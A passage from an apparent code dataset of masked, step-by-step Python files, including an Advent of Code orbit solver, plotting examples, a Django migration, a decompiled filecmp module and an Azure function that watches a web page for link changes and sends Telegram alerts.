dict\"\"\"\n r = [key]\n while True:\n this_one = r[-1]\n if this_one == 'COM':\n return r\n r.append(parents[this_one])\n\n\ndef part2(input):\n parents = {}\n for i, line in enumerate(input.split('\\n')):\n about, object = line.split(')')\n parents[object] = about\n santa = get_parents('SAN', parents)\n me = get_parents('YOU', parents)\n for i, planet in enumerate(me):\n if planet in santa:\n print(f'met at {planet}')\n print('')\n print(santa[:santa.index(planet) + 1])\n print(len(santa[:santa.index(planet) + 1]))\n print(santa.index(planet))\n print('')\n print(me[:i + 1])\n print(len(me[:i + 1]))\n print(i)\n return i + santa.index(planet) - 1\n\n\ndata['example'] = \"\"\"COM)B\nB)C\nC)D\nD)E\nE)F\nB)G\nG)H\nD)I\nE)J\nJ)K\nK)L\nK)YOU\nI)SAN\"\"\"\nfor scenario in scenarios:\n input = data[scenario]\n r = part2(input)\n print(f'Part 2 answer {r}')\n",
"step-4": "import sys\nimport json\nwith open(__file__.replace('.py', '.txt')) as f:\n problem = f.read()\ndata = {'problem': problem, 'example':\n \"\"\"COM)B\nB)C\nC)D\nD)E\nE)F\nB)G\nG)H\nD)I\nE)J\nJ)K\nK)L\"\"\"}\n\n\ndef solve_problem(input):\n parents = {}\n for i, line in enumerate(input.split('\\n')):\n about, object = line.split(')')\n parents[object] = about\n orbit_counts = {'COM': 0}\n for object in tuple(parents.keys()):\n stack = [object]\n while stack[-1] not in orbit_counts:\n stack.append(parents[stack[-1]])\n known = orbit_counts[stack.pop()]\n stack.reverse()\n for thing in stack:\n orbit_counts[thing] = orbit_counts[parents[thing]] + 1\n return sum(orbit_counts.values())\n\n\nif sys.argv[-1] in data.keys():\n scenarios = sys.argv[-1],\nelse:\n scenarios = tuple(data.keys())\nfor scenario in scenarios:\n input = data[scenario]\n r = solve_problem(input)\n print(f'FINAL ANSWER: {r}')\nprint('')\nprint('**** PART 2 ******')\n\n\ndef get_parents(key, parents):\n \"\"\"Get parents for a particular key through parents dict\"\"\"\n r = [key]\n while True:\n this_one = r[-1]\n if this_one == 'COM':\n return r\n r.append(parents[this_one])\n\n\ndef part2(input):\n parents = {}\n for i, line in enumerate(input.split('\\n')):\n about, object = line.split(')')\n parents[object] = about\n santa = get_parents('SAN', parents)\n me = get_parents('YOU', parents)\n for i, planet in enumerate(me):\n if planet in santa:\n print(f'met at {planet}')\n print('')\n print(santa[:santa.index(planet) + 1])\n print(len(santa[:santa.index(planet) + 1]))\n print(santa.index(planet))\n print('')\n print(me[:i + 1])\n print(len(me[:i + 1]))\n print(i)\n return i + santa.index(planet) - 1\n\n\ndata['example'] = \"\"\"COM)B\nB)C\nC)D\nD)E\nE)F\nB)G\nG)H\nD)I\nE)J\nJ)K\nK)L\nK)YOU\nI)SAN\"\"\"\nfor scenario in scenarios:\n input = data[scenario]\n r = part2(input)\n print(f'Part 2 answer {r}')\n",
"step-5": "import sys\nimport json\n\n\nwith open(__file__.replace('.py', '.txt')) as f:\n problem = f.read()\n\n\ndata = {\n 'problem': problem,\n 'example': \"\"\"COM)B\nB)C\nC)D\nD)E\nE)F\nB)G\nG)H\nD)I\nE)J\nJ)K\nK)L\"\"\" # should give 42\n}\n\n\ndef solve_problem(input):\n parents = {}\n for i, line in enumerate(input.split('\\n')):\n about, object = line.split(')')\n parents[object] = about\n\n orbit_counts = {'COM': 0}\n\n for object in tuple(parents.keys()):\n stack = [object]\n while stack[-1] not in orbit_counts:\n stack.append(parents[stack[-1]])\n known = orbit_counts[stack.pop()]\n stack.reverse()\n for thing in stack:\n orbit_counts[thing] = orbit_counts[parents[thing]] + 1\n\n return sum(orbit_counts.values())\n\n\n# part 1\nif sys.argv[-1] in data.keys():\n scenarios = (sys.argv[-1],)\nelse:\n scenarios = tuple(data.keys())\n\n\nfor scenario in scenarios:\n input = data[scenario]\n r = solve_problem(input)\n print(f'FINAL ANSWER: {r}')\n\n\n# 932, too low\n\nprint('')\nprint('**** PART 2 ******')\n\n\ndef get_parents(key, parents):\n \"\"\"Get parents for a particular key through parents dict\"\"\"\n r = [key]\n while True:\n this_one = r[-1]\n if this_one == 'COM':\n return r\n r.append(parents[this_one])\n\n\ndef part2(input):\n parents = {}\n for i, line in enumerate(input.split('\\n')):\n about, object = line.split(')')\n parents[object] = about\n\n santa = get_parents('SAN', parents)\n me = get_parents('YOU', parents)\n\n for i, planet in enumerate(me):\n if planet in santa:\n print(f'met at {planet}')\n print('')\n print(santa[:santa.index(planet) + 1])\n print(len(santa[:santa.index(planet) + 1]))\n # minus one because we want traversials between elements in list\n print(santa.index(planet))\n print('')\n print(me[:i + 1])\n print(len(me[:i + 1]))\n # minus one because we want traversials between elements in list\n print(i)\n # minus another one because transfering to the planet is already counted\n # ...or something like that\n # minus one because problem said so\n return i + santa.index(planet) - 1\n\ndata['example'] = \"\"\"COM)B\nB)C\nC)D\nD)E\nE)F\nB)G\nG)H\nD)I\nE)J\nJ)K\nK)L\nK)YOU\nI)SAN\"\"\"\n\nfor scenario in scenarios:\n input = data[scenario]\n r = part2(input)\n print(f'Part 2 answer {r}')\n\n# 432, too high\n# 433, too high\n# 431, too high\n# 430, correct\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
def Hello_worlder(x):
a = []
for i in range(x):
a.append('Hello world')
for i in a:
print(i)
Hello_worlder(10)
|
normal
|
{
"blob_id": "4f116f3eec9198a56a047ab42ed8e018ebb794bb",
"index": 3528,
"step-1": "<mask token>\n",
"step-2": "def Hello_worlder(x):\n a = []\n for i in range(x):\n a.append('Hello world')\n for i in a:\n print(i)\n\n\n<mask token>\n",
"step-3": "def Hello_worlder(x):\n a = []\n for i in range(x):\n a.append('Hello world')\n for i in a:\n print(i)\n\n\nHello_worlder(10)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.image import imread
X = np.array([[51, 55], [14, 19], [0, 4]])
print(X)
A = np.array([[1, 2], [3, 4]])
B = np.array([10, 20])
print(A * B)
print(X[0])
print(X[0][1])
for row in X:
print(row)
newX = X.flatten()
print(newX)
print(X > 15)
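# Boolean indexing picks out the matching elements: X[X > 15] -> array([51, 55, 19])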
# Prepare the data
x = np.arange(0, 6, 0.1) # generate values from 0 to 6 in steps of 0.1
y = np.sin(x)
# Draw the graph
plt.plot(x, y)
plt.show()
# Prepare the data
y1 = np.sin(x)
y2 = np.cos(x)
# Draw the graph
plt.plot(x, y1, label="sin")
plt.plot(x, y2, linestyle="--", label="cos") # cos 함수는 점선으로 그리기
plt.xlabel("x") # x축 이름
plt.ylabel("y") # y축 이름
plt.title('sin & cos') # 제목
plt.legend()
plt.show()
# Draw an image
img = imread('/Users/jiwon/Downloads/R800x0.png') # read the image file
plt.imshow(img)
plt.show()
|
normal
|
{
"blob_id": "ba702a9c5d9d31e48b047c106d77cf1707031d70",
"index": 1795,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(X)\n<mask token>\nprint(A * B)\nprint(X[0])\nprint(X[0][1])\nfor row in X:\n print(row)\n<mask token>\nprint(newX)\nprint(X > 15)\n<mask token>\nplt.plot(x, y)\nplt.show()\n<mask token>\nplt.plot(x, y1, label='sin')\nplt.plot(x, y2, linestyle='--', label='cos')\nplt.xlabel('x')\nplt.ylabel('y')\nplt.title('sin & cos')\nplt.legend()\nplt.show()\n<mask token>\nplt.imshow(img)\nplt.show()\n",
"step-3": "<mask token>\nX = np.array([[51, 55], [14, 19], [0, 4]])\nprint(X)\nA = np.array([[1, 2], [3, 4]])\nB = np.array([10, 20])\nprint(A * B)\nprint(X[0])\nprint(X[0][1])\nfor row in X:\n print(row)\nnewX = X.flatten()\nprint(newX)\nprint(X > 15)\nx = np.arange(0, 6, 0.1)\ny = np.sin(x)\nplt.plot(x, y)\nplt.show()\ny1 = np.sin(x)\ny2 = np.cos(x)\nplt.plot(x, y1, label='sin')\nplt.plot(x, y2, linestyle='--', label='cos')\nplt.xlabel('x')\nplt.ylabel('y')\nplt.title('sin & cos')\nplt.legend()\nplt.show()\nimg = imread('/Users/jiwon/Downloads/R800x0.png')\nplt.imshow(img)\nplt.show()\n",
"step-4": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.image import imread\nX = np.array([[51, 55], [14, 19], [0, 4]])\nprint(X)\nA = np.array([[1, 2], [3, 4]])\nB = np.array([10, 20])\nprint(A * B)\nprint(X[0])\nprint(X[0][1])\nfor row in X:\n print(row)\nnewX = X.flatten()\nprint(newX)\nprint(X > 15)\nx = np.arange(0, 6, 0.1)\ny = np.sin(x)\nplt.plot(x, y)\nplt.show()\ny1 = np.sin(x)\ny2 = np.cos(x)\nplt.plot(x, y1, label='sin')\nplt.plot(x, y2, linestyle='--', label='cos')\nplt.xlabel('x')\nplt.ylabel('y')\nplt.title('sin & cos')\nplt.legend()\nplt.show()\nimg = imread('/Users/jiwon/Downloads/R800x0.png')\nplt.imshow(img)\nplt.show()\n",
"step-5": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.image import imread\n\nX = np.array([[51, 55], [14, 19], [0, 4]])\nprint(X)\n\nA = np.array([[1, 2], [3, 4]])\nB = np.array([10, 20])\nprint(A * B)\n\nprint(X[0])\nprint(X[0][1])\n\nfor row in X:\n print(row)\n\nnewX = X.flatten()\nprint(newX)\n\nprint(X > 15)\n\n# 데이터 준비\nx = np.arange(0, 6, 0.1) # 0에서 6까지 0.1 간격으로 생\ny = np.sin(x)\n\n# 그래프 그리기\nplt.plot(x, y)\nplt.show()\n\n# 데이터 준비\ny1 = np.sin(x)\ny2 = np.cos(x)\n\n# 그래프 그리기\nplt.plot(x, y1, label=\"sin\")\nplt.plot(x, y2, linestyle=\"--\", label=\"cos\") # cos 함수는 점선으로 그리기\nplt.xlabel(\"x\") # x축 이름\nplt.ylabel(\"y\") # y축 이름\nplt.title('sin & cos') # 제목\nplt.legend()\nplt.show()\n\n# 이미지 그리기\nimg = imread('/Users/jiwon/Downloads/R800x0.png') #이미지 읽어오기\n\nplt.imshow(img)\nplt.show()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Generated by Django 2.1.4 on 2019-04-17 03:56
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('historiasClinicas', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='actualizacion',
name='valoracion_medica',
field=models.CharField(choices=[('Apto para desempeñar el cargo sin patologia aparente', 'Apto para desempeñar el cargo sin patologia aparente'), ('Apto para desempañar el cargo con patologia que no limita la labor', 'Apto para desempañar el cargo con patologia que no limita la labor'), ('Apto con restricciones o adaptaciones para la labor', 'Apto con restricciones o adaptaciones para la labor'), ('Aplazado', 'Aplazado'), ('Apto para labor el alturas', 'Apto para labor el alturas'), ('Apto para continuar desempeñando su labor', 'Apto para continuar desempeñando su labor'), ('Examen de retiro', 'Examen de retiro'), ('Apto para manipulación de alimentos', 'Apto para manipulación de alimentos')], max_length=50, verbose_name='Concepto de valoracion medica'),
),
]
|
normal
|
{
"blob_id": "4aefabf064cdef963f9c62bd5c93892207c301d3",
"index": 3076,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('historiasClinicas', '0001_initial')]\n operations = [migrations.AlterField(model_name='actualizacion', name=\n 'valoracion_medica', field=models.CharField(choices=[(\n 'Apto para desempeñar el cargo sin patologia aparente',\n 'Apto para desempeñar el cargo sin patologia aparente'), (\n 'Apto para desempañar el cargo con patologia que no limita la labor',\n 'Apto para desempañar el cargo con patologia que no limita la labor'\n ), ('Apto con restricciones o adaptaciones para la labor',\n 'Apto con restricciones o adaptaciones para la labor'), ('Aplazado',\n 'Aplazado'), ('Apto para labor el alturas',\n 'Apto para labor el alturas'), (\n 'Apto para continuar desempeñando su labor',\n 'Apto para continuar desempeñando su labor'), ('Examen de retiro',\n 'Examen de retiro'), ('Apto para manipulación de alimentos',\n 'Apto para manipulación de alimentos')], max_length=50,\n verbose_name='Concepto de valoracion medica'))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('historiasClinicas', '0001_initial')]\n operations = [migrations.AlterField(model_name='actualizacion', name=\n 'valoracion_medica', field=models.CharField(choices=[(\n 'Apto para desempeñar el cargo sin patologia aparente',\n 'Apto para desempeñar el cargo sin patologia aparente'), (\n 'Apto para desempañar el cargo con patologia que no limita la labor',\n 'Apto para desempañar el cargo con patologia que no limita la labor'\n ), ('Apto con restricciones o adaptaciones para la labor',\n 'Apto con restricciones o adaptaciones para la labor'), ('Aplazado',\n 'Aplazado'), ('Apto para labor el alturas',\n 'Apto para labor el alturas'), (\n 'Apto para continuar desempeñando su labor',\n 'Apto para continuar desempeñando su labor'), ('Examen de retiro',\n 'Examen de retiro'), ('Apto para manipulación de alimentos',\n 'Apto para manipulación de alimentos')], max_length=50,\n verbose_name='Concepto de valoracion medica'))]\n",
"step-5": "# Generated by Django 2.1.4 on 2019-04-17 03:56\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('historiasClinicas', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='actualizacion',\n name='valoracion_medica',\n field=models.CharField(choices=[('Apto para desempeñar el cargo sin patologia aparente', 'Apto para desempeñar el cargo sin patologia aparente'), ('Apto para desempañar el cargo con patologia que no limita la labor', 'Apto para desempañar el cargo con patologia que no limita la labor'), ('Apto con restricciones o adaptaciones para la labor', 'Apto con restricciones o adaptaciones para la labor'), ('Aplazado', 'Aplazado'), ('Apto para labor el alturas', 'Apto para labor el alturas'), ('Apto para continuar desempeñando su labor', 'Apto para continuar desempeñando su labor'), ('Examen de retiro', 'Examen de retiro'), ('Apto para manipulación de alimentos', 'Apto para manipulación de alimentos')], max_length=50, verbose_name='Concepto de valoracion medica'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from pycat.base.color import Color
from pycat.sprite import Sprite
from pycat.window import Window
from pyglet.gl.glext_arb import GL_FONT_HEIGHT_NV
from random import randint
window=Window()
class Chick(Sprite):
def on_create(self):
self.image = 'chick-a.png'
self.goto_random_position()
self.opacity = 500
self.scale = 1
self.rotation = randint(0, 360)
# c1 = window.create_sprite(Chick)
# c2 = window.create_sprite(Chick)
for i in range(1000):
e = window.create_sprite(Chick)
e.opacity = 200
e.scale = 2
e.color = Color.RED
window.run()
|
normal
|
{
"blob_id": "cc7942c406e9bcb5af43f131fdf0a6441f81c16a",
"index": 4260,
"step-1": "<mask token>\n\n\nclass Chick(Sprite):\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Chick(Sprite):\n\n def on_create(self):\n self.image = 'chick-a.png'\n self.goto_random_position()\n self.opacity = 500\n self.scale = 1\n self.rotation = randint(0, 360)\n\n\nfor i in range(1000):\n e = window.create_sprite(Chick)\n e.opacity = 200\n e.scale = 2\n e.color = Color.RED\nwindow.run()\n",
"step-3": "<mask token>\nwindow = Window()\n\n\nclass Chick(Sprite):\n\n def on_create(self):\n self.image = 'chick-a.png'\n self.goto_random_position()\n self.opacity = 500\n self.scale = 1\n self.rotation = randint(0, 360)\n\n\nfor i in range(1000):\n e = window.create_sprite(Chick)\n e.opacity = 200\n e.scale = 2\n e.color = Color.RED\nwindow.run()\n",
"step-4": "from pycat.base.color import Color\nfrom pycat.sprite import Sprite\nfrom pycat.window import Window\nfrom pyglet.gl.glext_arb import GL_FONT_HEIGHT_NV\nfrom random import randint\nwindow = Window()\n\n\nclass Chick(Sprite):\n\n def on_create(self):\n self.image = 'chick-a.png'\n self.goto_random_position()\n self.opacity = 500\n self.scale = 1\n self.rotation = randint(0, 360)\n\n\nfor i in range(1000):\n e = window.create_sprite(Chick)\n e.opacity = 200\n e.scale = 2\n e.color = Color.RED\nwindow.run()\n",
"step-5": "from pycat.base.color import Color\nfrom pycat.sprite import Sprite\nfrom pycat.window import Window\nfrom pyglet.gl.glext_arb import GL_FONT_HEIGHT_NV\nfrom random import randint\nwindow=Window()\n\n\nclass Chick(Sprite):\n\n def on_create(self):\n self.image = 'chick-a.png'\n self.goto_random_position()\n self.opacity = 500\n self.scale = 1\n self.rotation = randint(0, 360)\n\n\n# c1 = window.create_sprite(Chick)\n# c2 = window.create_sprite(Chick)\n\nfor i in range(1000):\n e = window.create_sprite(Chick)\n e.opacity = 200\n e.scale = 2\n e.color = Color.RED\n\nwindow.run()",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
# uncompyle6 version 3.2.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)]
# Embedded file name: filecmp
import os, stat
from itertools import ifilter, ifilterfalse, imap, izip
__all__ = [
'cmp', 'dircmp', 'cmpfiles']
_cache = {}
BUFSIZE = 8192
def cmp(f1, f2, shallow=1):
s1 = _sig(os.stat(f1))
s2 = _sig(os.stat(f2))
if s1[0] != stat.S_IFREG or s2[0] != stat.S_IFREG:
return False
if shallow and s1 == s2:
return True
if s1[1] != s2[1]:
return False
outcome = _cache.get((f1, f2, s1, s2))
if outcome is None:
outcome = _do_cmp(f1, f2)
if len(_cache) > 100:
_cache.clear()
_cache[(f1, f2, s1, s2)] = outcome
return outcome
def _sig(st):
return (
stat.S_IFMT(st.st_mode),
st.st_size,
st.st_mtime)
def _do_cmp(f1, f2):
bufsize = BUFSIZE
with open(f1, 'rb') as (fp1):
with open(f2, 'rb') as (fp2):
while True:
b1 = fp1.read(bufsize)
b2 = fp2.read(bufsize)
if b1 != b2:
return False
if not b1:
return True
class dircmp:
def __init__(self, a, b, ignore=None, hide=None):
self.left = a
self.right = b
if hide is None:
self.hide = [
os.curdir, os.pardir]
else:
self.hide = hide
if ignore is None:
self.ignore = [
'RCS', 'CVS', 'tags']
else:
self.ignore = ignore
return
def phase0(self):
self.left_list = _filter(os.listdir(self.left), self.hide + self.ignore)
self.right_list = _filter(os.listdir(self.right), self.hide + self.ignore)
self.left_list.sort()
self.right_list.sort()
def phase1(self):
a = dict(izip(imap(os.path.normcase, self.left_list), self.left_list))
b = dict(izip(imap(os.path.normcase, self.right_list), self.right_list))
self.common = map(a.__getitem__, ifilter(b.__contains__, a))
self.left_only = map(a.__getitem__, ifilterfalse(b.__contains__, a))
self.right_only = map(b.__getitem__, ifilterfalse(a.__contains__, b))
def phase2(self):
self.common_dirs = []
self.common_files = []
self.common_funny = []
for x in self.common:
a_path = os.path.join(self.left, x)
b_path = os.path.join(self.right, x)
ok = 1
try:
a_stat = os.stat(a_path)
except os.error as why:
ok = 0
try:
b_stat = os.stat(b_path)
except os.error as why:
ok = 0
if ok:
a_type = stat.S_IFMT(a_stat.st_mode)
b_type = stat.S_IFMT(b_stat.st_mode)
if a_type != b_type:
self.common_funny.append(x)
elif stat.S_ISDIR(a_type):
self.common_dirs.append(x)
elif stat.S_ISREG(a_type):
self.common_files.append(x)
else:
self.common_funny.append(x)
else:
self.common_funny.append(x)
def phase3(self):
xx = cmpfiles(self.left, self.right, self.common_files)
self.same_files, self.diff_files, self.funny_files = xx
def phase4(self):
self.subdirs = {}
for x in self.common_dirs:
a_x = os.path.join(self.left, x)
b_x = os.path.join(self.right, x)
self.subdirs[x] = dircmp(a_x, b_x, self.ignore, self.hide)
def phase4_closure(self):
self.phase4()
for sd in self.subdirs.itervalues():
sd.phase4_closure()
def report(self):
print 'diff', self.left, self.right
if self.left_only:
self.left_only.sort()
print 'Only in', self.left, ':', self.left_only
if self.right_only:
self.right_only.sort()
print 'Only in', self.right, ':', self.right_only
if self.same_files:
self.same_files.sort()
print 'Identical files :', self.same_files
if self.diff_files:
self.diff_files.sort()
print 'Differing files :', self.diff_files
if self.funny_files:
self.funny_files.sort()
print 'Trouble with common files :', self.funny_files
if self.common_dirs:
self.common_dirs.sort()
print 'Common subdirectories :', self.common_dirs
if self.common_funny:
self.common_funny.sort()
print 'Common funny cases :', self.common_funny
def report_partial_closure(self):
self.report()
for sd in self.subdirs.itervalues():
print
sd.report()
def report_full_closure(self):
self.report()
for sd in self.subdirs.itervalues():
print
sd.report_full_closure()
methodmap = dict(subdirs=phase4, same_files=phase3, diff_files=phase3, funny_files=phase3, common_dirs=phase2, common_files=phase2, common_funny=phase2, common=phase1, left_only=phase1, right_only=phase1, left_list=phase0, right_list=phase0)
def __getattr__(self, attr):
if attr not in self.methodmap:
raise AttributeError, attr
self.methodmap[attr](self)
return getattr(self, attr)
def cmpfiles(a, b, common, shallow=1):
res = ([], [], [])
for x in common:
ax = os.path.join(a, x)
bx = os.path.join(b, x)
res[_cmp(ax, bx, shallow)].append(x)
return res
def _cmp(a, b, sh, abs=abs, cmp=cmp):
try:
return not abs(cmp(a, b, sh))
except (os.error, IOError):
return 2
def _filter(flist, skip):
return list(ifilterfalse(skip.__contains__, flist))
def demo():
import sys, getopt
options, args = getopt.getopt(sys.argv[1:], 'r')
if len(args) != 2:
raise getopt.GetoptError('need exactly two args', None)
dd = dircmp(args[0], args[1])
if ('-r', '') in options:
dd.report_full_closure()
else:
dd.report()
return
if __name__ == '__main__':
demo()
|
normal
|
{
"blob_id": "38f6700b283bdc68a0271cb3ec397ce72aa2de3c",
"index": 6589,
"step-1": "# uncompyle6 version 3.2.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)]\n# Embedded file name: filecmp\nimport os, stat\nfrom itertools import ifilter, ifilterfalse, imap, izip\n__all__ = [\n 'cmp', 'dircmp', 'cmpfiles']\n_cache = {}\nBUFSIZE = 8192\n\ndef cmp(f1, f2, shallow=1):\n s1 = _sig(os.stat(f1))\n s2 = _sig(os.stat(f2))\n if s1[0] != stat.S_IFREG or s2[0] != stat.S_IFREG:\n return False\n if shallow and s1 == s2:\n return True\n if s1[1] != s2[1]:\n return False\n outcome = _cache.get((f1, f2, s1, s2))\n if outcome is None:\n outcome = _do_cmp(f1, f2)\n if len(_cache) > 100:\n _cache.clear()\n _cache[(f1, f2, s1, s2)] = outcome\n return outcome\n\n\ndef _sig(st):\n return (\n stat.S_IFMT(st.st_mode),\n st.st_size,\n st.st_mtime)\n\n\ndef _do_cmp(f1, f2):\n bufsize = BUFSIZE\n with open(f1, 'rb') as (fp1):\n with open(f2, 'rb') as (fp2):\n while True:\n b1 = fp1.read(bufsize)\n b2 = fp2.read(bufsize)\n if b1 != b2:\n return False\n if not b1:\n return True\n\n\nclass dircmp:\n\n def __init__(self, a, b, ignore=None, hide=None):\n self.left = a\n self.right = b\n if hide is None:\n self.hide = [\n os.curdir, os.pardir]\n else:\n self.hide = hide\n if ignore is None:\n self.ignore = [\n 'RCS', 'CVS', 'tags']\n else:\n self.ignore = ignore\n return\n\n def phase0(self):\n self.left_list = _filter(os.listdir(self.left), self.hide + self.ignore)\n self.right_list = _filter(os.listdir(self.right), self.hide + self.ignore)\n self.left_list.sort()\n self.right_list.sort()\n\n def phase1(self):\n a = dict(izip(imap(os.path.normcase, self.left_list), self.left_list))\n b = dict(izip(imap(os.path.normcase, self.right_list), self.right_list))\n self.common = map(a.__getitem__, ifilter(b.__contains__, a))\n self.left_only = map(a.__getitem__, ifilterfalse(b.__contains__, a))\n self.right_only = map(b.__getitem__, ifilterfalse(a.__contains__, b))\n\n def phase2(self):\n self.common_dirs = []\n self.common_files = []\n self.common_funny = []\n for x in self.common:\n a_path = os.path.join(self.left, x)\n b_path = os.path.join(self.right, x)\n ok = 1\n try:\n a_stat = os.stat(a_path)\n except os.error as why:\n ok = 0\n\n try:\n b_stat = os.stat(b_path)\n except os.error as why:\n ok = 0\n\n if ok:\n a_type = stat.S_IFMT(a_stat.st_mode)\n b_type = stat.S_IFMT(b_stat.st_mode)\n if a_type != b_type:\n self.common_funny.append(x)\n elif stat.S_ISDIR(a_type):\n self.common_dirs.append(x)\n elif stat.S_ISREG(a_type):\n self.common_files.append(x)\n else:\n self.common_funny.append(x)\n else:\n self.common_funny.append(x)\n\n def phase3(self):\n xx = cmpfiles(self.left, self.right, self.common_files)\n self.same_files, self.diff_files, self.funny_files = xx\n\n def phase4(self):\n self.subdirs = {}\n for x in self.common_dirs:\n a_x = os.path.join(self.left, x)\n b_x = os.path.join(self.right, x)\n self.subdirs[x] = dircmp(a_x, b_x, self.ignore, self.hide)\n\n def phase4_closure(self):\n self.phase4()\n for sd in self.subdirs.itervalues():\n sd.phase4_closure()\n\n def report(self):\n print 'diff', self.left, self.right\n if self.left_only:\n self.left_only.sort()\n print 'Only in', self.left, ':', self.left_only\n if self.right_only:\n self.right_only.sort()\n print 'Only in', self.right, ':', self.right_only\n if self.same_files:\n self.same_files.sort()\n print 'Identical files :', self.same_files\n if self.diff_files:\n self.diff_files.sort()\n print 'Differing files :', self.diff_files\n if 
self.funny_files:\n self.funny_files.sort()\n print 'Trouble with common files :', self.funny_files\n if self.common_dirs:\n self.common_dirs.sort()\n print 'Common subdirectories :', self.common_dirs\n if self.common_funny:\n self.common_funny.sort()\n print 'Common funny cases :', self.common_funny\n\n def report_partial_closure(self):\n self.report()\n for sd in self.subdirs.itervalues():\n print\n sd.report()\n\n def report_full_closure(self):\n self.report()\n for sd in self.subdirs.itervalues():\n print\n sd.report_full_closure()\n\n methodmap = dict(subdirs=phase4, same_files=phase3, diff_files=phase3, funny_files=phase3, common_dirs=phase2, common_files=phase2, common_funny=phase2, common=phase1, left_only=phase1, right_only=phase1, left_list=phase0, right_list=phase0)\n\n def __getattr__(self, attr):\n if attr not in self.methodmap:\n raise AttributeError, attr\n self.methodmap[attr](self)\n return getattr(self, attr)\n\n\ndef cmpfiles(a, b, common, shallow=1):\n res = ([], [], [])\n for x in common:\n ax = os.path.join(a, x)\n bx = os.path.join(b, x)\n res[_cmp(ax, bx, shallow)].append(x)\n\n return res\n\n\ndef _cmp(a, b, sh, abs=abs, cmp=cmp):\n try:\n return not abs(cmp(a, b, sh))\n except (os.error, IOError):\n return 2\n\n\ndef _filter(flist, skip):\n return list(ifilterfalse(skip.__contains__, flist))\n\n\ndef demo():\n import sys, getopt\n options, args = getopt.getopt(sys.argv[1:], 'r')\n if len(args) != 2:\n raise getopt.GetoptError('need exactly two args', None)\n dd = dircmp(args[0], args[1])\n if ('-r', '') in options:\n dd.report_full_closure()\n else:\n dd.report()\n return\n\n\nif __name__ == '__main__':\n demo()",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import datetime
import logging
import os
import requests
from bs4 import BeautifulSoup
import telebot
from azure.storage.blob import BlobClient
import hashlib
import azure.functions as func
def hash_string(input_string: str) -> str:
return hashlib.sha256(input_string.encode("utf-8")).hexdigest()
def main(mytimer: func.TimerRequest) -> None:
utc_timestamp = datetime.datetime.utcnow().replace(
tzinfo=datetime.timezone.utc).isoformat()
if mytimer.past_due:
logging.info('The timer is past due!')
logging.info('Python timer trigger function ran at %s', utc_timestamp)
url = os.environ['TargetUrl']
search_term = os.environ['SearchTerm']
reqs = requests.get(url)
soup = BeautifulSoup(reqs.text, 'html.parser')
    token = os.environ['TelebotToken']
chat_id = os.environ['TelebotChatId']
urls = []
for link in soup.find_all('a'):
link_url = link.get('href')
# Add only links that contain the search term
if search_term in link_url:
urls.append(link_url)
logging.info(f"Looking for: {search_term}")
logging.info(f"Urls conatining the pattern: {urls}")
lst_to_str = ';'.join([str(i) for i in urls])
new_hash = hash_string(lst_to_str)
now = datetime.datetime.now()
file_suffix = now.strftime("%Y%m%d%I%M%S")
year = now.year
month = now.month
day = now.day
blob = BlobClient.from_connection_string(
conn_str=os.environ['AzureWebJobsStorage'], container_name="hashstore", blob_name=f'urls/{year}/{month}/{day}/html-{file_suffix}.html')
blob.upload_blob(lst_to_str, blob_type='BlockBlob')
logging.info(new_hash)
blob = BlobClient.from_connection_string(
conn_str=os.environ['AzureWebJobsStorage'], container_name="hashstore", blob_name='hash.tmp')
blob_hash = ''
if blob.exists():
blob_hash = str(blob.download_blob().readall())
if blob_hash != new_hash:
message = f'Hash of this page: {url} has changed'
bot = telebot.TeleBot(token)
bot.config['api_key'] = token
bot.send_message(chat_id, message)
blob.delete_blob()
blob.upload_blob(new_hash, blob_type='BlockBlob')
logging.info(f'Old hash >>>> {blob_hash}')
logging.info(f'New hash >>>> {new_hash}')
|
normal
|
{
"blob_id": "670a23aa910a6709735281b7e64e5254a19277c6",
"index": 7924,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef hash_string(input_string: str) ->str:\n return hashlib.sha256(input_string.encode('utf-8')).hexdigest()\n\n\n<mask token>\n",
